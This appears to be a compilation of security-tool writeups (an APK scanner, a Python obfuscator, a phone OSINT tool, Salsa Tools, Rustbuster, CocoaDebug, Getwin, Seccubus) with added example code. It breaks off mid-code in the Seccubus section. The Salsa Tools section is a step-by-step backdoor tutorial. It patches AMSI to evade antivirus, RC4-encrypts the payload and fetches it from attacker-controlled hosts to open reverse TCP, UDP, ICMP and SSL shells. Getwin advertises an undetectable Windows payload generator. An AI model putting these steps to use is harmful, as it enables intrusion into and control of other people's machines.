
Yaazhini - Free Android APK & API Vulnerability Scanner


Yaazhini is a free vulnerability scanner for Android APKs and APIs. It is a user-friendly tool with which you can scan any APK, and the REST API of any Android application, and find vulnerabilities. Yaazhini includes an API vulnerability scan, an APK vulnerability scan and a reporting section to generate a report.

System Requirements
Operating systems    Mac OS X (64-bit), Windows (64-bit and 32-bit)
RAM                  Minimum 4 GB of available memory; 16 GB required for larger Android apps
Storage              10 GB of available disk space
Dependency software  Java 1.8+

Advantages of Yaazhini

  •     Scan Android APK by just one click
  •     Scan Android Application REST API (emulator, device)
  •     Generate report
  •     Free to use
  •     Easy to use

How to use Yaazhini Android Application APK Scanner


  •     Start the Yaazhini Application.
  •     Provide the project name
  •     Upload the APK file
  •     Click on the Upload & Scan button
  •     After the scan completes, the details of each vulnerability are shown and a report can be generated


Yaazhini - Android Application Rest API Scanner


Yaazhini – Android Application REST API Scanner can help you find the following vulnerability classes:

  •     SQL Injection
  •     Command Injection
  •     Header Injection
  •     Cross-site Scripting (possible)
  •     Missing Security Headers
  •     Sensitive Information Disclosure in Response Headers
  •     Sensitive Information Disclosure in Error messages
  •     Missing Server Side Input Validation
  •     Unwanted Use of HTTP Methods
  •     Improper HTTP Response and more
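Two of the checks in that list, missing security headers and sensitive information disclosure in response headers, come down to inspecting the response header map. The following is an added example written for this page, not Yaazhini's own code: the baseline header set, the disclosure-header list and the sample response are assumptions constructed so it runs offline.

```python
# Added example, not part of Yaazhini: two of the checks listed above, run over
# constructed response headers so it works offline. The baseline header set and
# the sample response are assumptions for this example.
from typing import Dict, List

# Headers a hardened API response is expected to carry (assumed baseline).
EXPECTED_SECURITY_HEADERS = {
    "strict-transport-security": "HSTS missing; a downgrade to plain HTTP is possible",
    "x-content-type-options": "MIME sniffing not disabled (expect 'nosniff')",
    "x-frame-options": "no clickjacking protection",
    "content-security-policy": "no Content-Security-Policy",
    "cache-control": "no Cache-Control; sensitive responses may be cached",
}

# Headers that commonly leak server or framework versions.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")


def normalise(headers: Dict[str, str]) -> Dict[str, str]:
    """Lower-case header names: HTTP header names are case-insensitive."""
    return {name.lower(): value for name, value in headers.items()}


def missing_security_headers(headers: Dict[str, str]) -> List[str]:
    """Report absent security headers, plus a present-but-weak X-Content-Type-Options."""
    present = normalise(headers)
    findings = [f"{name}: {why}" for name, why in EXPECTED_SECURITY_HEADERS.items()
                if name not in present]
    if present.get("x-content-type-options", "nosniff").lower() != "nosniff":
        findings.append("x-content-type-options present but not 'nosniff'")
    return findings


def disclosed_versions(headers: Dict[str, str]) -> List[str]:
    """Flag disclosure headers whose value carries a version number."""
    present = normalise(headers)
    return [f"{name}: {present[name]}" for name in DISCLOSURE_HEADERS
            if name in present and any(ch.isdigit() for ch in present[name])]


# Constructed sample response headers (not from a real scan).
SAMPLE_RESPONSE = {
    "Content-Type": "application/json",
    "Server": "Apache/2.4.29 (Ubuntu)",
    "X-Powered-By": "PHP/7.2.24",
    "X-Content-Type-Options": "nosniff",
}

if __name__ == "__main__":
    for finding in missing_security_headers(SAMPLE_RESPONSE) + disclosed_versions(SAMPLE_RESPONSE):
        print("[!]", finding)
```

A bare `Server: nginx` is not reported, only values that carry a version string; whether that is a finding at all is a policy choice, which is why the list of expected headers is kept as data rather than hard-coded.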


How to use Yaazhini Android Application REST API Scanner

  • Start the application.
  • Create a new project.
  • Add a new request to the created project.
  • Provide the proper headers, URL and data.
  • Save and run the scan from the menu bar.
  • After the scan completes, click Generate Report in the menu bar.

Sample Reports for Yaazhini

The Yaazhini Android APK Scanner sample report starts with a quick summary of the findings and their risk ratings. Each finding has a detailed explanation of the risk and recommendations for fixing the vulnerability. The vulnerabilities are ordered by risk level.

The Yaazhini Mobile Application (REST API) Scanner sample report follows the same layout: a summary of findings and risk ratings, then a detailed explanation and recommendations per finding, ordered by risk level.



Intensio-Obfuscator - Obfuscate A Python Code 2.X And 3.X


Takes Python source code and transforms it into obfuscated Python code: replaces the names of variables, classes and functions with random strings of a chosen length, removes comments and line breaks, and adds to each line a random script whose values differ every time.

Requirement
  • Python >= 3.5

Files supported
  • Files written in python 2.x and 3.x

Installation
git clone https://github.com/Hnfull/Intensio-Obfuscator.git
cd Intensio-Obfuscator/intensio/

Features
Feature        Description
Replace        Replace all names of defined variables, classes and functions, and remove all line breaks
Padding        Add random scripts after each line and remove all line breaks
Remove         Remove all comments and all line breaks
Secret         Only for the curious :)
Mixer lower    Generate 32-character words that replace the variables, classes and functions defined in the source code, and in the random scripts if the 'replace' or 'padding' feature is specified
Mixer medium   Same as above, with 64-character words
Mixer high     Same as above, with 128-character words

Usages
-h, --help              -> show this help message and exit.
-f, --onefile -> if only one file.
-d, --multiplefiles -> if multiple files (project).
-i, --input -> source file or directory - if multiple files indicate a directory that contain all your files.
-c, --code -> language used in input file or directory. value: [python]
-o, --output -> output file or directory that will be obfuscated - if multiple file indicate a empty directory that will contain all your files.
-m, --mixer -> length level of variables mix output. values: [lower,medium,high]
-r, --replace -> activate the 'replace' obfuscation feature.
-p, --padding -> activate the 'padding' obfuscation feature.
-rm, --remove -> activate the 'remove' obfuscation feature.
-s, --secret -> activate the 'secret' bullshit feature.
  •     To exclude Python variables, classes or functions from the 'replace' feature, edit intensio/exclude_python_words.txt
  •     To include Python variables, classes or functions that the 'replace' feature would otherwise not rename, edit intensio/include_python_words.txt
Do not give local variables, classes or functions the same names as Python keywords or as functions or classes of imported Python libraries!

Examples

Python target file(s):
  • Multiple files basic: python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/basic/input/basicRAT -c python -o test/python/multiplefiles/basic/output/basicRAT -m lower -r -rm
  • Multiple files advanced: python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/advanced/input/basicRAT -c python -o test/python/multiplefiles/advanced/output/basicRAT -m high -r -p -rm
  •     For a single file the command is the same as for multiple files: point -i and -o at a Python file instead of a directory and replace -d with -f.

Possible malfunctions
  •     If a variable, class or function has the same name as a word inside ' ' or " " in a print() call, that text is replaced with the mixed name as well.
  •     If a variable, class or function has the same name as a word after # (a comment), that text is replaced with the mixed name as well; inside """ or ''' blocks that are not assigned to a variable, no replacement is performed.
  •     If you name variables, classes or functions the same as Python keywords or as functions/classes of imported Python libraries, an error may appear: the name is obfuscated everywhere it occurs, including where the keyword or library object was meant. Edit intensio/excluded_python_words.txt to add the names that must not be obfuscated, or rename your local variables, classes or functions.
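The malfunctions above follow from how the 'replace' feature works: it is a textual rename, so anything that happens to spell the same word is renamed too. The following is an added example for this page, not Intensio-Obfuscator's code. It reimplements the core of 'replace' and 'remove' with the standard tokenize module, renaming only NAME tokens, so a string literal that contains a renamed word survives (the print() case above is avoided). Attribute names are still renamed, so a defined name that collides with an imported library's attribute breaks exactly as the README warns; the `exclude` argument plays the role of the excluded-words file. The sample program and the `main` entry point are constructed for the example.

```python
# Added example; this is not Intensio-Obfuscator's code. Reimplements the core
# of the 'replace' and 'remove' features: names the source itself defines
# (functions, classes, variables, parameters) are mapped to random identifiers
# of the mixer length and swapped in at the token level; comments are dropped.
# Only NAME tokens are rewritten, so string literals are left alone.
import ast
import builtins
import io
import keyword
import random
import string
import tokenize
from typing import Dict, Iterable, Optional, Set

MIXER_LENGTH = {"lower": 32, "medium": 64, "high": 128}  # from the feature table


def defined_names(source: str) -> Set[str]:
    """Names bound by the source itself; imports, builtins, keywords and dunders stay."""
    bound: Set[str] = set()
    imported: Set[str] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            bound.add(node.name)
        elif isinstance(node, ast.arg):
            bound.add(node.arg)
        elif isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store):
            bound.add(node.id)
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            for alias in node.names:
                imported.add((alias.asname or alias.name).split(".")[0])
    return {n for n in bound - imported
            if not n.startswith("__") and not keyword.iskeyword(n) and not hasattr(builtins, n)}


def build_mapping(names: Iterable[str], mixer: str, seed: Optional[int] = None) -> Dict[str, str]:
    """One random identifier of the mixer length per name (a letter first, then alphanumerics)."""
    rng = random.Random(seed)
    length = MIXER_LENGTH[mixer]
    mapping: Dict[str, str] = {}
    for name in sorted(names):
        while True:
            candidate = rng.choice(string.ascii_letters) + "".join(
                rng.choices(string.ascii_letters + string.digits, k=length - 1))
            if candidate not in mapping.values():
                break
        mapping[name] = candidate
    return mapping


def obfuscate(source: str, mixer: str = "lower", exclude: Iterable[str] = (),
              seed: Optional[int] = None) -> str:
    """'replace' + 'remove': rename defined names and drop comments; untokenize re-spaces the code."""
    mapping = build_mapping(defined_names(source) - set(exclude), mixer, seed)
    tokens = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type == tokenize.COMMENT:
            continue                                    # comment removal
        text = mapping.get(tok.string, tok.string) if tok.type == tokenize.NAME else tok.string
        tokens.append((tok.type, text))                 # 2-tuples: untokenize recomputes spacing
    return tokenize.untokenize(tokens)


def run_module(source: str, entry: str = "main"):
    """Execute a module's text and call its entry point (excluded from renaming, hence findable)."""
    namespace: Dict[str, object] = {}
    exec(compile(source, "<obfuscated>", "exec"), namespace)
    return namespace[entry]()


# Constructed sample program (not from the README's test/ directory).
SAMPLE = '''\
import math

def hypot(width, height):
    # length of the diagonal
    total = width * width + height * height
    return math.sqrt(total)

class Box:
    def __init__(self, width, height):
        self.width = width
        self.height = height

    def diagonal(self):
        return hypot(self.width, self.height)

def main():
    label = "hypot"  # the string literal must survive untouched
    return label, Box(3, 4).diagonal()
'''

if __name__ == "__main__":
    print(obfuscate(SAMPLE, mixer="lower", exclude={"main"}, seed=1))
```

Running the obfuscated module gives the same result as the original while no defined name survives in the text; because `math` is imported it is never renamed, and `sqrt` is untouched simply because the sample never defines a `sqrt` of its own, which is precisely the collision the README tells you to avoid.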

Todo
  • Version 1.0.1-x:
    • Code optimization
    • Fix bugs and problems
    • Improved features already present
  • Version 1.1.0:
    • Support files written in C
  • Version 1.2.0:
    • Support files written in C++

Disclaimer
  • Intensio-Obfuscator is for education/research purposes only. The author takes NO responsibility for how you choose to use any of the tools provided.



PhoneInfoga - Advanced Information Gathering & OSINT Tool For Phone Numbers


PhoneInfoga is one of the most advanced tools for scanning phone numbers using only free resources. The goal is first to gather standard information such as country, area, carrier and line type for any international phone number with very good accuracy, then to search for footprints on search engines to try to find the VoIP provider or identify the owner.

Features
  • Check if phone number exists and is possible
  • Gather standard information such as country, line type, and carrier
  • OSINT footprinting using external APIs, Google Hacking, phone books & search engines
  • Check for reputation reports, social media, disposable numbers and more
  • Scan several numbers at once
  • Use custom formatting for more effective OSINT reconnaissance
  • Automatic footprinting on several custom formats




Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP and AV bypass, AMSI patched

Salsa Tools is a collection of three different tools that, combined, give you a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI), most of the components were originally written in C#. Salsa Tools was publicly released by Luis Vacas during his talk “Inmersión en la explotación tiene rima” at h-c0n on 9th February 2019.

Features
* TCP/UDP/ICMP/DNS/BIND/SSL     
* AV Safe (17th February)
* AMSI patchers
* PowerShell execution
* ...

Overview
Salsa-Tools is made from three different ingredients:
  • EvilSalsa
  • EncrypterAssembly
  • SalseoLoader
Its behaviour is described in the following sections.

Setup

Requirements
  • Visual Studio 2017 (or similar)
  • Python 2.7

Running la Salsa

Cooking EvilSalsa

[+] That is our Payload
EvilSalsa is the key ingredient of this recipe. It contains the payload, which is executed on the system as follows: as soon as the payload starts, it loads System.Management.Automation.dll and creates a runspace. Within that runspace several types of shell are available (TCP / UDP / ICMP / DNS / BINDTCP). Once EvilSalsa is loaded, the first thing it does is check whether c:\windows\system32\amsi.dll exists. If it does, it is patched using a home-cooked variant of the CyberArk and Rastamouse bypasses.

Mixing EncrypterAssembly and Evilsalsa

[+] Software that encrypts the payload using RC4
[+] We have the version in python and the version in .exe
EncrypterAssembly can be used as a Python script or as an .exe binary. It RC4-encrypts the previously generated EvilSalsa.
Python usage:
python encrypterassembly.py <FILE> <PASSWORD> <OUTPUT>
Executable usage:
Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>
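What EncrypterAssembly does is a plain RC4 pass over the assembly bytes, keyed by the password that SalseoLoader is later given. The following is an added example for this page, not Salsa Tools' EncrypterAssembly: it keeps the same <FILE> <PASSWORD> <OUTPUT> shape, the sample payload bytes are constructed, and the output layout (raw keystream XOR with no header) is an assumption.

```python
# Added example, not Salsa Tools' EncrypterAssembly: an RC4 routine with the same
# <FILE> <PASSWORD> <OUTPUT> shape, so the encrypted blob is what a loader holding
# the password would decrypt back to the original bytes. The payload bytes are
# constructed; the output layout (raw RC4 keystream XOR, no header) is assumed.
import sys
from typing import Iterator


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Key-scheduling (KSA), then the pseudo-random generation loop (PRGA)."""
    if not key:
        raise ValueError("empty key")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(data: bytes, password: str) -> bytes:
    """RC4 is a stream cipher: the same call encrypts and decrypts."""
    stream = rc4_keystream(password.encode("utf-8"))
    return bytes(b ^ next(stream) for b in data)


def encrypt_file(src: str, password: str, dst: str) -> int:
    """python rc4_example.py <FILE> <PASSWORD> <OUTPUT>; returns the number of bytes written."""
    with open(src, "rb") as f:
        blob = rc4(f.read(), password)
    with open(dst, "wb") as f:
        f.write(blob)
    return len(blob)


# Constructed stand-in for an assembly: a PE-looking header plus filler (not a real DLL).
FAKE_DLL = b"MZ\x90\x00" + b"This program cannot be run in DOS mode." + bytes(range(32))

if __name__ == "__main__":
    if len(sys.argv) == 4:
        print(encrypt_file(sys.argv[1], sys.argv[2], sys.argv[3]), "bytes written")
    else:
        blob = rc4(FAKE_DLL, "password")
        print(blob.hex()[:32], "...", "round trip ok:", rc4(blob, "password") == FAKE_DLL)
```

The point of this step is signature evasion, not confidentiality: the "MZ" header and the strings an AV engine would match on disappear from the file at rest, but the password travels on the command line or in an environment variable next to the loader, so anyone who has the blob and the process arguments can recover the assembly.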

Bringing the Encrypted EvilSalsa to the table with SalseoLoader
SalseoLoader is in charge of loading the encrypted payload. It can be compiled either as a library or as an executable. If it is run as an executable, the arguments are passed on the command line. If it is compiled as a library, the entry point "main" must be exported and the arguments are supplied through environment variables.

By: CyberVaca@HackPlayers

[+] Usage:

[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
[-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
[-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode

[+] Shells availables:

[-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode
[-] ReverseUDP [-] ReverseICMP [-] BindTCP

Tutorial

Compiling the binaries
Download the source code from GitHub and compile EvilSalsa and SalseoLoader. You will need Visual Studio installed to compile the code.
Compile both projects for the architecture of the Windows box where you are going to use them (if the target supports x64, compile for x64).
You can select the architecture inside Visual Studio in the "Build" tab on the left, under "Platform Target".
(If you can't find this option, open the "Project" tab and then "Properties".)


Then build both projects (Build -> Build Solution); the path of the executable appears in the build output:


Prepare the Backdoor
First of all, you need to encrypt EvilSalsa.dll (the README calls this "encoding"). To do so, use the Python script encrypterassembly.py or compile the EncrypterAssembly project.

Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt

Windows
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt
Now you have everything you need to run the whole Salseo thing: the encrypted EvilSalsa.dll and the SalseoLoader binary. Upload the SalseoLoader.exe binary to the machine. It shouldn't be detected by any AV...

Execute the backdoor

Getting a TCP reverse shell (downloading the encrypted DLL through HTTP)
Remember to start nc as the reverse-shell listener and an HTTP server to serve the encrypted EvilSalsa.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Getting a UDP reverse shell (downloading the encrypted DLL through SMB)
Remember to start nc as the reverse-shell listener and an SMB server to serve the encrypted EvilSalsa (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>\folder\evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Getting a TCP reverse shell over SSL (using a local file)
Set the listener inside the attacker machine:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port <port> -tls1
Execute the backdoor:
SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL <Attacker-IP> <Port>

Getting an ICMP reverse shell (encrypted DLL already on the victim)
This time you need a special tool on the attacker side to receive the reverse shell. Download: [https://github.com/inquisb/icmpsh]
Disable ICMP echo replies on the attacker machine, so that the kernel does not answer the victim's pings itself:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#When you finish, you can enable them again by running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Execute the icmpsh master:
python icmpsh_m.py "<Attacker-IP>" "<Victim-IP>"
On the victim, run the Salseo thing:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Compiling SalseoLoader as DLL exporting main function
Open the SalseoLoader project using Visual Studio.

Before the main function, add this line: [DllExport]


Install DllExport for this project
Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...


Search for DllExport package (using Browse tab), and press Install (and accept the popup)


Two files will have appeared in your project folder: DllExport.bat and DllExport_Configure.bat

Uninstall DllExport
Press Uninstall (yes, it's weird, but trust me, it is necessary)


Exit Visual Studio and execute DllExport_Configure
Just exit Visual Studio.
Then go to your SalseoLoader folder and execute DllExport_Configure.bat. Select x64 (if you are going to use it inside an x64 box, as in my case), select System.Runtime.InteropServices (inside "Namespace for DllExport") and press Apply.


Open the project again with Visual Studio
[DllExport] should no longer be marked as an error.


Build the solution
Select Output Type = Class Library (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)


Select x64 platform (Project --> SalseoLoader Properties --> Build --> Platform target = x64)


To build the solution: Build --> Build Solution (the path of the new DLL appears in the Output console)

Test the generated DLL
Copy the DLL to wherever you want to test it.
Execute:
rundll32.exe SalseoLoader.dll,main
If no error appears, you probably have a functional DLL!

Get a shell using the DLL
Don't forget to run an HTTP server and set up a nc listener. When loaded as a DLL, SalseoLoader reads its arguments from the environment variables pass, payload, lhost, lport and shell:

Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
Documented by https://github.com/carlospolop-forks/



Rustbuster - DirBuster For Rust


DirBuster for Rust.

Usage
There are three modules currently implemented:
  1. Dirbuster (default)
    rustbuster -m dir -u http://localhost:3000/ -w examples/wordlist -e php
  2. Dnsbuster
    rustbuster -m dns -u google.com -w examples/wordlist
  3. Vhostbuster
    rustbuster -m vhost -u http://localhost:3000/ -w examples/wordlist -d test.local -x "Hello"

~ rustbuster v. 1.2.0 ~ by phra & ps1dr3x ~

USAGE:
rustbuster [FLAGS] [OPTIONS] --url <url> --wordlist <wordlist>

FLAGS:
-f, --append-slash Tries to also append / to the base request
-K, --exit-on-error Exits on connection errors
-h, --help Prints help information
-k, --ignore-certificate Disables TLS certificate validation
--no-banner Skips initial banner
--no-progress-bar Disables the progress bar
-V, --version Prints version information
-v, --verbose Sets the level of verbosity

OPTIONS:
-d, --domain <domain> Uses the specified domain
-e, --extensions <extensions> Sets the extensions [default: ]
-b, --http-body <http-body> Uses the specified HTTP body [default: ]
-H, --http-header <http-header>... Appends the specified HTTP header
-X, --http-method <http-method> Uses the specified HTTP method [default: GET]
-S, --ignore-status-codes <ignore-status-codes> Sets the list of status codes to ignore [default: 404]
-x, --ignore-string <ignore-string>... Ignores results with specified string in vhost mode
-s, --include-status-codes <include-status-codes> Sets the list of status codes to include [default: ]
-m, --mode <mode> Sets the mode of operation (dir, dns, vhost) [default: dir]
-o, --output <output> Saves the results in the specified file [default: ]
-t, --threads <threads> Sets the amount of concurrent requests [default: 10]
-u, --url <url> Sets the target URL
-a, --user-agent <user-agent> Uses the specified User-Agent [default: rustbuster]
-w, --wordlist <wordlist> Sets the wordlist
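The dir and vhost modes differ only in what varies per wordlist entry (the path versus the Host header) and in how results are filtered (-s/-S status codes versus -x substrings). The following is an added example written for this page, not Rustbuster's code: it implements that candidate generation and filtering with the HTTP client replaced by a constructed response table, so it runs offline. The URLs, words and responses are invented.

```python
# Added example, not Rustbuster's code: the candidate generation and result
# filtering behind the dir and vhost modes, with the HTTP client swapped for a
# constructed response table so it runs offline. Flag semantics follow the help
# text above (-e, -f, -s, -S, -d, -x); URLs and responses are invented.
from typing import Callable, Dict, Iterable, Iterator, Optional, Sequence, Tuple

Response = Tuple[int, str]                        # (status code, body)
Fetch = Callable[[str, Optional[str]], Response]  # fetch(url, host_header)


def dir_candidates(url: str, words: Iterable[str], extensions: Sequence[str],
                   append_slash: bool) -> Iterator[str]:
    """-m dir: word, word.<ext> for each -e extension, and word/ when -f is set."""
    base = url.rstrip("/") + "/"
    for word in words:
        yield base + word
        for ext in extensions:
            yield f"{base}{word}.{ext}"
        if append_slash:
            yield base + word + "/"


def keep(status: int, body: str, include: Sequence[int], ignore: Sequence[int],
         ignore_strings: Sequence[str]) -> bool:
    """-s (include) wins when given; otherwise drop -S codes and bodies containing -x strings."""
    if include:
        return status in include
    if status in ignore:
        return False
    return not any(s in body for s in ignore_strings)


def dirbust(url: str, words: Iterable[str], fetch: Fetch, extensions: Sequence[str] = (),
            append_slash: bool = False, include: Sequence[int] = (), ignore: Sequence[int] = (404,)):
    hits = []
    for candidate in dir_candidates(url, words, extensions, append_slash):
        status, body = fetch(candidate, None)
        if keep(status, body, include, ignore, ()):
            hits.append((candidate, status))
    return hits


def vhostbust(url: str, words: Iterable[str], domain: str, fetch: Fetch,
              ignore_strings: Sequence[str] = ()):
    """-m vhost: same URL every time, a different Host header per word (-d domain)."""
    hits = []
    for word in words:
        host = f"{word}.{domain}"
        status, body = fetch(url, host)
        if keep(status, body, (), (), ignore_strings):
            hits.append(host)
    return hits


# Constructed response table standing in for http://localhost:3000 (-u).
BASE = "http://localhost:3000"
PATHS: Dict[str, Response] = {
    f"{BASE}/admin": (301, ""),
    f"{BASE}/admin/": (200, "admin panel"),
    f"{BASE}/index.php": (200, "Hello"),
    f"{BASE}/backup": (403, ""),
}
VHOSTS: Dict[str, Response] = {"dev.test.local": (200, "dev site")}


def fake_fetch(url: str, host: Optional[str]) -> Response:
    if host is not None:                       # vhost mode: unknown hosts get the default site
        return VHOSTS.get(host, (200, "Hello"))
    return PATHS.get(url, (404, "Not Found"))


if __name__ == "__main__":
    words = ["admin", "index", "backup", "missing"]
    print(dirbust(BASE, words, fake_fetch, extensions=["php"], append_slash=True))
    print(vhostbust(BASE, ["dev", "www"], "test.local", fake_fetch, ignore_strings=["Hello"]))
```

Note why -x matters in vhost mode: every Host header gets some 200 response from the default site, so status codes cannot separate real virtual hosts from noise; filtering on a string from the default page ("Hello" here) is what leaves only dev.test.local.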



CocoaDebug - iOS Debugging Tool


 iOS Debugging Tool
  • Shake to hide or show the black bubble. (support both device and simulator)
  • Long press the black bubble to show UIDebuggingInformationOverlay. (Apple's Private API, support iOS 10/11/12)
  • Application memory usage and FPS.
  • List all print() and NSLog() messages which have been written by developer in Xcode. (optional)
  • List of all the network requests sent by the application. (optional)
  • List crash errors. (optional)
  • Share network details via email or copy to clipboard when you are in the Network Details page.
  • Copy logs. (long press the text, then select all or select copy)
  • Search logs by keyword.
  •     List application and device information, including: version, build, bundle name, bundle id, screen resolution, device, iOS version
  •     List all sandbox folders and files, with support for previewing and editing them.
  •     List HTML logs, including console.log(), console.debug(), console.warn(), console.error(), console.info(). (support both WKWebView and UIWebView). (optional)
  • Support JSON and Google's Protocol buffers

Installation

CocoaPods
platform :ios, '8.0'
use_frameworks!

target 'YourTargetName' do
pod 'CocoaDebug', :configurations => ['Debug']
end

Carthage
github "CocoaDebug/CocoaDebug"  
WARNING: Don't submit an .ipa to the App Store that has been linked with CocoaDebug.framework. The Integration Guide outlines a way to use build configurations to isolate linking the framework to Debug builds only.

Usage

Swift
//Step 1. (AppDelegate.swift)
#if DEBUG
import CocoaDebug
#endif

//Step 2. (AppDelegate.swift)
#if DEBUG
CocoaDebug.enable()
#endif

//Step 3. (AppDelegate.swift)
public func print<T>(file: String = #file, function: String = #function, line: Int = #line, _ message: T, color: UIColor = .white) {
    #if DEBUG
    swiftLog(file, function, line, message, color, false)
    #endif
}

Objective-C
//Step 1. (AppDelegate.m)
#ifdef DEBUG
@import CocoaDebug;
#endif

//Step 2. (AppDelegate.m)
#ifdef DEBUG
[CocoaDebug enable];
#endif

//Step 3. (PrefixHeader.pch)
#ifdef DEBUG
#import "_ObjcLog.h"
//#import //if use framework
#endif

//Step 4. (PrefixHeader.pch)
#ifdef DEBUG
#define NSLog(fmt, ...) [_ObjcLog logWithFile:__FILE__ function:__FUNCTION__ line:__LINE__ color:[UIColor whiteColor] unicodeToChinese:NO message:(fmt), ##__VA_ARGS__]
#else
#define NSLog(fmt, ...) nil
#endif

Parameters

When you initialize CocoaDebug, you can customize the following parameter values before CocoaDebug.enable().
  •     serverURL - If the captured URLs contain the server URL, those URLs are shown in bold to mark them; nothing is marked when the value is nil. Default value is nil.
  •     ignoredURLs - URLs that should not be captured (case-insensitive); all URLs are captured when the value is nil. Default value is nil.
  •     onlyURLs - The only URLs that are captured (case-insensitive); all URLs are captured when the value is nil. Default value is nil.
  •     tabBarControllers - Controllers to be added as child controllers of the UITabBarController. Default value is nil.
  •     logMaxCount - The maximum number of logs CocoaDebug displays. Default value is 1000.
  •     emailToRecipients - Initial recipients for the email's "To" field when sharing via email. Default value is nil.
  •     emailCcRecipients - Initial recipients for the email's "Cc" field when sharing via email. Default value is nil.
  •     mainColor - The main color, in hexadecimal format. Default value is #42d459.


Getwin - FUD Win32 Payload Generator And Listener


FUD Win32 payload generator and listener

Legal disclaimer:
Usage of GetWin for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Features
  • FUD : Fully Undetectable
  •     No need to configure port forwarding or install other programs; it uses only ssh and serveo.net.

Usage:
git clone https://github.com/thelinuxchoice/getwin
cd getwin
bash getwin.sh

Install requirements (mingw-w64):
sudo apt-get install mingw-w64



Seccubus - Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus automates regular vulnerability scans with various tools and helps security people analyse the output quickly, both on the first scan and on repeated scans.
On repeated scans, delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.
Seccubus 2.x is the only actively developed and maintained branch; all support for Seccubus V1 has officially been dropped.
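The delta rule above is the whole value of the tool: a finding is identified by what was tested where, and an analyst's earlier verdict is carried forward as long as the scanner's output for it is unchanged. The following is an added example for this page, not Seccubus code; the finding record, the status names and both scan results are constructed, and Seccubus's own schema differs.

```python
# Added example, not Seccubus code: the delta logic behind "findings only need to
# be judged when they first appear or when their output changes". Finding records
# and both scan results are constructed; Seccubus's own schema and status names differ.
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class Finding:
    host: str
    port: str      # e.g. "443/tcp"
    plugin: str    # scanner check id
    output: str    # scanner's evidence text


Key = Tuple[str, str, str]


def index(findings: Iterable[Finding]) -> Dict[Key, Finding]:
    """A finding is identified by what was tested where, not by its output."""
    return {(f.host, f.port, f.plugin): f for f in findings}


def delta(previous: Iterable[Finding], current: Iterable[Finding]) -> Dict[str, List[Finding]]:
    old, new = index(previous), index(current)
    report: Dict[str, List[Finding]] = {"new": [], "changed": [], "unchanged": [], "gone": []}
    for key, finding in new.items():
        if key not in old:
            report["new"].append(finding)
        elif old[key].output != finding.output:
            report["changed"].append(finding)
        else:
            report["unchanged"].append(finding)
    report["gone"] = [old[key] for key in old if key not in new]
    return report


def judgement_queue(previous: Iterable[Finding], current: Iterable[Finding],
                    verdicts: Dict[Key, str]) -> Tuple[List[Finding], Dict[Key, str]]:
    """Findings an analyst must look at, plus the earlier verdicts that carry forward.

    verdicts maps a finding key to the analyst's previous decision (e.g. "confirmed",
    "false positive"); unchanged findings keep it, new and changed ones go back to the queue.
    """
    report = delta(previous, current)
    carried = {(f.host, f.port, f.plugin): verdicts[(f.host, f.port, f.plugin)]
               for f in report["unchanged"] if (f.host, f.port, f.plugin) in verdicts}
    return report["new"] + report["changed"], carried


# Constructed scan results (nmap-style open ports and a TLS check).
SCAN_1 = [
    Finding("10.0.0.5", "22/tcp", "nmap:open", "OpenSSH 7.4"),
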